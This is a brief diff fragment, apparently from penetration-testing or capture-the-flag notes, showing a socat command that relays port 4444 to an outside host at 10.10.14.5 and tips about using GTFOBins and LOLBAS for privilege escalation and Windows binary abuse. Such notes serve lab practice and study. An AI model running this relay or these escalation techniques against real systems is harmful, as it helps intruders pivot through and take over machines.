 socat TCP-LISTEN:4444,fork TCP:10.10.14.5:4444

 For SUID/capability binary exploitation, always check GTFOBins.
-For Windows binaries, check LOLBAS.
+For Windows binary abuse, check LOLBAS.